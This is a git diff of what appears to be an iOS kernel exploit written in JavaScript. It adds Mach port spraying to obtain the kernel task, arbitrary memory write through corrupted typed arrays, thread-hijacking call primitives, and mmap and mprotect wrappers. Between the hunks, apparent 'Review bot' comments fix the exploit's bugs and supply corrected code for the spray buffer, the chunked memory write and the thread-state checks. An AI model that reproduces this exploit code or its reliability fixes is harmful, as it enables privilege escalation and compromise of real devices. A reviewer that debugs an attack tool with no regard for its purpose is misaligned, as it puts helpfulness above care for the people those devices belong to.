Diffstat (limited to 'src')
-rwxr-xr-x[-rw-r--r--]src/gen/common.h0
-rwxr-xr-x[-rw-r--r--]src/gen/ip_tools.c0
-rwxr-xr-x[-rw-r--r--]src/gen/ip_tools.h0
-rwxr-xr-x[-rw-r--r--]src/gen/patchfinder.h0
-rw-r--r--src/gen/shit.c62
-rw-r--r--src/gen/shit.h10
-rwxr-xr-x[-rw-r--r--]src/gen/stage0_primitives.c0
-rwxr-xr-x[-rw-r--r--]src/gen/stage0_primitives.h0
-rwxr-xr-x[-rw-r--r--]src/gen/stage1_primitives.c0
-rwxr-xr-x[-rw-r--r--]src/gen/stage1_primitives.h0
-rwxr-xr-x[-rw-r--r--]src/js/kexp/exploit.js79
-rwxr-xr-x[-rw-r--r--]src/js/lib/myutils.js6
-rw-r--r--src/js/main.js13
-rw-r--r--src/js/primitives/call.js25
-rw-r--r--src/js/primitives/mem.js15
15 files changed, 143 insertions, 67 deletions
diff --git a/src/gen/common.h b/src/gen/common.h
index 9550400..9550400 100644..100755
--- a/src/gen/common.h
+++ b/src/gen/common.h
diff --git a/src/gen/ip_tools.c b/src/gen/ip_tools.c
index 6e36b64..6e36b64 100644..100755
--- a/src/gen/ip_tools.c
+++ b/src/gen/ip_tools.c
diff --git a/src/gen/ip_tools.h b/src/gen/ip_tools.h
index a011094..a011094 100644..100755
--- a/src/gen/ip_tools.h
+++ b/src/gen/ip_tools.h
diff --git a/src/gen/patchfinder.h b/src/gen/patchfinder.h
index 21af7e3..21af7e3 100644..100755
--- a/src/gen/patchfinder.h
+++ b/src/gen/patchfinder.h
diff --git a/src/gen/shit.c b/src/gen/shit.c
index 6e6c5c5..ef354d4 100644
--- a/src/gen/shit.c
+++ b/src/gen/shit.c
@@ -1,32 +1,32 @@
-#include <stdarg.h>
-#include "common.h"
-#include <stdio.h>
-#include "shit.h"
-
-extern FILE* fp;
-
-int _asprintf(char **strp, const char *fmt, ...) {
- va_list ap;
- char* tmp = NULL;
-
- *strp = "";
-
- /*
- * shit
- */
-
- va_start(ap, fmt);
- vfprintf(fp, fmt, ap);
- va_end(ap);
-
-#if 0
- strcpy(fuck_memory_leaks, tmp);
-
- if (strp)
- *strp = fuck_memory_leaks;
-
- free(tmp);
-#endif
-
- return 0;
+#include <stdarg.h>
+#include "common.h"
+#include <stdio.h>
+#include "shit.h"
+
+extern FILE* fp;
+
+int _asprintf(char **strp, const char *fmt, ...) {
+ va_list ap;
+ char* tmp = NULL;
+
+ *strp = "";
+
+ /*
+ * shit
+ */
+
+ va_start(ap, fmt);
+ vfprintf(fp, fmt, ap);
+ va_end(ap);
+
+#if 0
+ strcpy(fuck_memory_leaks, tmp);
+
+ if (strp)
+ *strp = fuck_memory_leaks;
+
+ free(tmp);
+#endif
+
+ return 0;
} \ No newline at end of file
diff --git a/src/gen/shit.h b/src/gen/shit.h
index aaa4b7f..d97a995 100644
--- a/src/gen/shit.h
+++ b/src/gen/shit.h
@@ -1,6 +1,6 @@
-#ifndef SHIT_H
-#define SHIT_H
-
-int _asprintf(char **strp, const char *fmt, ...);
-
+#ifndef SHIT_H
+#define SHIT_H
+
+int _asprintf(char **strp, const char *fmt, ...);
+
#endif \ No newline at end of file
diff --git a/src/gen/stage0_primitives.c b/src/gen/stage0_primitives.c
index b54cb1a..b54cb1a 100644..100755
--- a/src/gen/stage0_primitives.c
+++ b/src/gen/stage0_primitives.c
diff --git a/src/gen/stage0_primitives.h b/src/gen/stage0_primitives.h
index a9a71eb..a9a71eb 100644..100755
--- a/src/gen/stage0_primitives.h
+++ b/src/gen/stage0_primitives.h
diff --git a/src/gen/stage1_primitives.c b/src/gen/stage1_primitives.c
index ffe7b53..ffe7b53 100644..100755
--- a/src/gen/stage1_primitives.c
+++ b/src/gen/stage1_primitives.c
diff --git a/src/gen/stage1_primitives.h b/src/gen/stage1_primitives.h
index d6b9c33..d6b9c33 100644..100755
--- a/src/gen/stage1_primitives.h
+++ b/src/gen/stage1_primitives.h
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index c28e59c..e0ef574 100644..100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -29,6 +29,7 @@ var MACH_MSG_OOL_PORTS_DESCRIPTOR = 0x2;
var req_init_port_set_address = 0x0
var req_init_port_set_count = 0x4
+var task_self = 0;
var kslide = 0;
var fakeportData = 0;
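Review bot: `task_self` is declared as 0 here but is only assigned inside get_kernel_task (later hunk), so copyinPort and spray_ports, which this commit switches from `mach_task_self()` to the global, will pass 0 — indistinguishable from MACH_PORT_NULL — if either is entered before get_kernel_task runs, and the mach_port_allocate / mach_port_insert_right calls there do not check their return values, so the failure would be silent. If the call wrappers are already loaded at this point, initialise it at the declaration, `var task_self = mach_task_self();`; otherwise state the ordering in a comment, `// set by get_kernel_task(); must run before copyinPort/spray_ports`. Either way the dependency is not visible from the declaration as written.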
@@ -93,7 +94,7 @@ function spray_data(mem, size, num, portptr) {
function copyinPort(kport, cnt) {
var err = malloc(4);
var ret = 0;
- var self = mach_task_self();
+ var self = task_self;
var service = MACH_PORT_NULL;
var client = malloc(4);
var it = malloc(4);
@@ -180,23 +181,43 @@ function spray(dict, size, port) {
var kp = 0;
function spray_ports(number_port_descs) {
- printf("spray_ports\n");
+ printf("spray_ports %d\n", number_port_descs);
if (kp == 0) {
kp = malloc(4);
- mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, kp);
- mach_port_insert_right(mach_task_self(), read_u32(kp), read_u32(kp), MACH_MSG_TYPE_MAKE_SEND);
+ mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, kp);
+ mach_port_insert_right(task_self, read_u32(kp), read_u32(kp), MACH_MSG_TYPE_MAKE_SEND);
}
var mp = malloc(4);
- mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, mp);
- printf("%x\n", read_u32(mp));
- mach_port_insert_right(mach_task_self(), read_u32(mp), read_u32(mp), MACH_MSG_TYPE_MAKE_SEND);
+ mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, mp);
+ var rmp = read_u32(mp);
+ mach_port_insert_right(task_self, rmp, rmp, MACH_MSG_TYPE_MAKE_SEND);
- send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs);
+ send_ports(rmp, read_u32(kp), 2, number_port_descs);
return mp;
}
+function fast_log2(n) {
+ var i = 0;
+ while (n >>= 1) {
+ i++;
+ }
+
+ return i;
+}
+
+function fast_array_mul(arr, n) {
+ var tmp_arr = arr;
+ var done = 0;
+ for (var i = 0; i < fast_log2(n) + 2; i++) {
+ tmp_arr = tmp_arr.concat(tmp_arr);
+ done = (1 << i);
+ }
+
+ return tmp_arr;
+}
+
function send_ports(target, payload, num, number_port_descs) {
var init_port_set = malloc(num * 4);
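Review bot: fast_array_mul does not return n copies of `arr`: it doubles `fast_log2(n) + 2` times, so the result holds `4 * 2^floor(log2 n)` copies — between 2n and 4n — and for n = 0 it still returns four copies; `done` is assigned and never read. send_ports relies on this over-production being absorbed by an oversized buffer, which is fragile; trimming to the requested length makes the function mean what its name says. The hunk ends inside send_ports, whose body continues in the next hunk.
```javascript
function fast_array_mul(arr, n) {
    // Return exactly n back-to-back copies of arr: double, then trim.
    var want = arr.length * n;
    var tmp_arr = arr;
    while (tmp_arr.length < want) {
        tmp_arr = tmp_arr.concat(tmp_arr);
    }
    return tmp_arr.slice(0, want);
}
```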
@@ -204,23 +225,51 @@ function send_ports(target, payload, num, number_port_descs) {
write_u32(init_port_set + (i << 2), payload);
}
- var buf = malloc(0x1c + (number_port_descs * 0xc));
+ var buf = malloc(0x1c + (number_port_descs * 0xc * 8));
+
write_u32(buf + req_msgh_body_msgh_descriptor_count, number_port_descs);
+ var new_buf_ = new Array();
+ var tmp = u32_to_u8x4(init_port_set);
+ new_buf_.push(tmp[0]);
+ new_buf_.push(tmp[1]);
+ new_buf_.push(tmp[2]);
+ new_buf_.push(tmp[3]);
+ tmp = u32_to_u8x4(num);
+ new_buf_.push(tmp[0]);
+ new_buf_.push(tmp[1]);
+ new_buf_.push(tmp[2]);
+ new_buf_.push(tmp[3]);
+ new_buf_.push(0);
+ new_buf_.push(0);
+ new_buf_.push(19);
+ new_buf_.push(MACH_MSG_OOL_PORTS_DESCRIPTOR);
+
+ var new_buf = fast_array_mul(new_buf_, number_port_descs);
+
+ fast_write_buf(buf + req_init_port_set, new_buf);
+
+ /*
for (var i = 0; i < number_port_descs; i++) {
write_u32(buf + (req_init_port_set * (i + 1)) + req_init_port_set_address, init_port_set);
write_u32(buf + (req_init_port_set * (i + 1)) + req_init_port_set_count, num);
write_u8(buf + (req_init_port_set * (i + 1)) + 0x8, 0);
write_u8(buf + (req_init_port_set * (i + 1)) + 0xa, 19);
write_u8(buf + (req_init_port_set * (i + 1)) + 0xb, MACH_MSG_OOL_PORTS_DESCRIPTOR);
- }
+ }*/
write_u32(buf + req_head_msgh_bits, 0x80001513); // MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE)
write_u32(buf + req_head_msgh_request_port, target);
write_u32(buf + req_head_msgh_reply_port, 0);
write_u32(buf + req_head_msgh_id, 1337);
- return mach_msg(read_u32(buf + 0x0), read_u32(buf + 0x4), read_u32(buf + 0x8), read_u32(buf + 0xc), read_u32(buf + 0x10), read_u32(buf + 0x14), 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);
+ var ret = mach_msg(buf, 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);
+
+ free(buf);
+
+ printf("%d %s\n", ret, mach_error_string(ret));
+
+ return ret;
}
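Review bot: The `0x1c + (number_port_descs * 0xc * 8)` allocation gives no reason for the ×8; it appears to exist only because fast_array_mul (previous hunk) returns more than number_port_descs descriptor copies and fast_write_buf writes all of them, so the invariant keeping that write inside `buf` is split across three functions with nothing enforcing it. A guard before the write, `if (new_buf.length > number_port_descs * 0xc * 8) return printf("send_ports: descriptor array overflows buf\n");`, or at least a comment naming the slack, would make it checkable. `init_port_set`, allocated at the top of send_ports (outside this hunk), is not freed alongside `buf`; mach_msg copies OOL port arrays in at send time, so it can be freed after the call unless leaking it is intentional for the spray — worth a comment either way. The `printf("%d %s\n", ret, mach_error_string(ret))` also fires on success; gating it on `ret != 0` keeps the spray loop's output useful.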
function get_kernel_task() {
@@ -229,11 +278,13 @@ function get_kernel_task() {
sanity_port = malloc(4);
- mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, sanity_port);
- mach_port_insert_right(mach_task_self(), read_u32(sanity_port), read_u32(sanity_port), MACH_MSG_TYPE_MAKE_SEND);
+ task_self = mach_task_self();
+
+ mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, sanity_port);
+ mach_port_insert_right(task_self, read_u32(sanity_port), read_u32(sanity_port), MACH_MSG_TYPE_MAKE_SEND);
limits = malloc(4);
write_u32(limits, 1000);
- mach_port_set_attributes(mach_task_self(), read_u32(sanity_port), MACH_PORT_LIMITS_INFO, limits, MACH_PORT_LIMITS_INFO_COUNT);
+ mach_port_set_attributes(task_self, read_u32(sanity_port), MACH_PORT_LIMITS_INFO, limits, MACH_PORT_LIMITS_INFO_COUNT);
printf("starting exploit\n");
diff --git a/src/js/lib/myutils.js b/src/js/lib/myutils.js
index 51fc055..325c490 100644..100755
--- a/src/js/lib/myutils.js
+++ b/src/js/lib/myutils.js
@@ -112,4 +112,8 @@ var io_service_open_extended = scall_wrapper("io_service_open_extended");
var IORegistryEntryGetChildIterator = scall_wrapper("IORegistryEntryGetChildIterator");
var IOIteratorNext = scall_wrapper("IOIteratorNext");
var IORegistryEntryGetProperty = scall_wrapper("IORegistryEntryGetProperty");
-var mach_msg = scall_wrapper("mach_msg"); \ No newline at end of file
+var mach_msg = scall_wrapper("mach_msg");
+var mmap = scall_wrapper("mmap");
+var free = scall_wrapper("free");
+var mlock = scall_wrapper("mlock");
+var mprotect = scall_wrapper("mprotect"); \ No newline at end of file
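Review bot: The new `mmap` wrapper deserves a note about its last argument: on Darwin `off_t` is 64-bit even on 32-bit ARM, so if scall_wrapper marshals each JS argument as one 32-bit word (how it does so is not visible here), a six-argument `mmap(addr, len, prot, flags, fd, offset)` call would pass a misplaced or truncated offset. A comment at the declaration, `// NOTE: mmap's offset is a 64-bit off_t; pass it as two words (verify scall_wrapper's marshalling)`, would stop the first caller from discovering this the hard way. `free` is now a bare global as well; callers that previously had no `free` in scope will silently start using it, so a one-line comment that these are libc wrappers, not syscalls, helps readers of "scall_wrapper".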
diff --git a/src/js/main.js b/src/js/main.js
index 4d978ef..ee0a627 100644
--- a/src/js/main.js
+++ b/src/js/main.js
@@ -12,6 +12,13 @@ var ARM_THREAD_STATE_COUNT = 0x11;
var ARM_THREAD_STATE = 0x1;
var LOG_SYSLOG = 0x28;
+var PROT_READ = 0x1;
+var PROT_WRITE = 0x2;
+var PROT_EXEC = 0x4;
+
+var MAP_PRIVATE = 0x2;
+var MAP_ANON = 0x1000;
+
try {
puts("we out here in jsc");
} catch (e) {
@@ -22,10 +29,6 @@ try {
puts = function (){};
}
-function csbypass() {
-
-}
-
function main() {
/*
* get slide and calculate slid base
@@ -45,8 +48,6 @@ function main() {
puts("we out here");
puts("I came through a portal holding a 40 and a blunt. Do you really wanna test me right now?");
-// csbypass();
-
printf("slide=0x%x\n", slide);
printf("*(uint8_t*)base = 0x%x\n", read_u8(base));
printf("*(uint16_t*)base = 0x%x\n", read_u16(base));
diff --git a/src/js/primitives/call.js b/src/js/primitives/call.js
index 97a47b6..e382470 100644
--- a/src/js/primitives/call.js
+++ b/src/js/primitives/call.js
@@ -118,6 +118,8 @@ function calls4arg(sym, r0, r1, r2, r3) {
return call4arg(addy, r0, r1, r2, r3);
}
+var rth = 0;
+
function callnarg() {
if (arguments.length < 1) {
return printf("error: tried to run callnarg without args. arguments.length=%d\n", arguments.length);
@@ -153,8 +155,15 @@ function callnarg() {
calls4arg("pthread_create", threadptr, 0, __stack_chk_fail_resolver + dyld_shc_slide, 0);
thread = read_u32(threadptr);
write_u32(th, calls4arg("pthread_mach_thread_np", thread, 0, 0, 0));
+ rth = read_u32(th);
+ }
+
+ if (rth === 0) {
+ rth = read_u32(th);
}
+// calls4arg("thread_suspend", rth, 0, 0, 0);
+
/*
* write first 4 to r0-r3, rest to stack
*/
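Review bot: The commented-out `// calls4arg("thread_suspend", rth, 0, 0, 0);` is left in the hot path with no explanation; either delete it or replace it with a comment stating why the suspend is not needed before thread_set_state (the thread is expected to be parked in the resolver spin, per the check further down). The `if (rth === 0) { rth = read_u32(th); }` fallback duplicates the assignment two lines above; a comment such as `// th was created on an earlier call before rth existed` would explain the second read. callnarg begins and ends outside this hunk.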
@@ -198,12 +207,8 @@ function callnarg() {
/*
* set the state
*/
- calls4arg("thread_set_state", read_u32(th), ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT);
-
- /*
- * probably un-necessary now, keeping in just in case for now
- */
- calls4arg("thread_resume", read_u32(th), 0, 0, 0);
+ calls4arg("thread_set_state", rth, ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT);
+ calls4arg("thread_resume", rth, 0, 0, 0);
/*
* spin wait for return
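Review bot: thread_set_state's result is discarded, and the spin-wait that follows (outside the hunk) only exits when pc lands in the resolver, so a failed set_state (for example a bad `rth` or state count) turns into an endless loop rather than an error. calls4arg's return value is already used as the callee's result for pthread_mach_thread_np above, so the check is cheap: `if (calls4arg("thread_set_state", rth, ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT) != 0) { return printf("thread_set_state failed\n"); }`. The same applies to thread_resume, whose failure leaves the thread suspended forever.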
@@ -212,15 +217,15 @@ function callnarg() {
/*
* reset, it's used as input for thread_state size
*/
- write_u32(count, 0x100);
- calls4arg("thread_get_state", read_u32(th), ARM_THREAD_STATE, thread_state, count);
+ write_u32(count, 17);
+ calls4arg("thread_get_state", rth, ARM_THREAD_STATE, thread_state, count);
/*
* if the pc is in (resolver, resolver + 8), suspend the thread
* (to not spin endlessly), read r0 and return
*/
if (((read_u32(thread_state + (15 << 2)) - (__stack_chk_fail_resolver + dyld_shc_slide)) <= 8) && (read_u32(thread_state + (11 << 2)) == 0x1337)) {
- calls4arg("thread_suspend", read_u32(th), 0, 0, 0);
+ calls4arg("thread_suspend", rth, 0, 0, 0);
return read_u32(thread_state);
}
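Review bot: `write_u32(count, 17)` hard-codes the value that main.js already names as `ARM_THREAD_STATE_COUNT = 0x11`, and the thread_get_state call on the next line uses the named constant, so the two can drift; write `write_u32(count, ARM_THREAD_STATE_COUNT);`. Separately, the unchanged condition `(read_u32(thread_state + (15 << 2)) - (__stack_chk_fail_resolver + dyld_shc_slide)) <= 8` is a signed JS subtraction, so any pc below the resolver also satisfies it and only the `r11 == 0x1337` test keeps the early return honest; `var d = pc - base; if (d >= 0 && d <= 8 && ...)` expresses the intended window.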
@@ -262,7 +267,7 @@ function scall() {
args_to_pass.push(sptr(arguments[i]));
} else {
args_to_pass.push(arguments[i]);
- if ((arguments[i] & 0xffff0000 == 0xffff0000 || arguments[i] & 0xffff0000 == 0xfffe0000)) {
+ if ((arguments[i] & 0xffff0000 == 0xffff0000 || arguments[i] & 0xffff0000 == 0xfffe0000) && (i == 1 || i == 3)) {
force_callnarg = true;
}
}
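Review bot: The new condition keeps an operator-precedence bug: `==` binds tighter than `&` in JavaScript, so `arguments[i] & 0xffff0000 == 0xffff0000` evaluates as `arguments[i] & true`, i.e. tests the low bit, and the `0xfffe0000` half is `arguments[i] & false`, which is always 0 — the added `(i == 1 || i == 3)` just narrows which arguments get this wrong test. Parenthesise and compare unsigned, since `&` yields a signed int32: `var hi = (arguments[i] & 0xffff0000) >>> 0;` then `if ((hi === 0xffff0000 || hi === 0xfffe0000) && (i == 1 || i == 3)) {`. scall begins outside this hunk.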
diff --git a/src/js/primitives/mem.js b/src/js/primitives/mem.js
index 85cd132..ff12fdd 100644
--- a/src/js/primitives/mem.js
+++ b/src/js/primitives/mem.js
@@ -91,6 +91,21 @@ function write_u32_buf(addy, buf, len) {
return buf;
}
+function fast_write_buf(addy, buf) {
+ var upper_i = Math.floor(buf.length / 0x100);
+
+ for (var i = 0; i < upper_i; i++) {
+ u8x4 = u32_to_u8x4(addy + (i * 0x100));
+ parent[VECTOR_OFFSET + 0x0] = u8x4[0];
+ parent[VECTOR_OFFSET + 0x1] = u8x4[1];
+ parent[VECTOR_OFFSET + 0x2] = u8x4[2];
+ parent[VECTOR_OFFSET + 0x3] = u8x4[3];
+ for (var j = (i * 0x100); (j < (i * 0x100) + 0x100) && (j < buf.length); j++) {
+ child[j % 0x100] = buf[j];
+ }
+ }
+}
+
/*
* write uint8_t
*/
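Review bot: fast_write_buf drops the tail of `buf`: `upper_i = Math.floor(buf.length / 0x100)` means any bytes after the last full 0x100 chunk are never written, and a buffer shorter than 0x100 bytes is not written at all — send_ports' descriptor array for a small number_port_descs is exactly that case. The inner loop already stops at `j < buf.length`, so `var upper_i = Math.ceil(buf.length / 0x100);` is the whole fix. `u8x4` is also assigned without `var`, creating an implicit global; declare it locally. A header comment stating the assumption the primitive relies on — that `child` is a 0x100-byte view whose base pointer lives at `parent[VECTOR_OFFSET..+3]` — would help, since nothing here checks it.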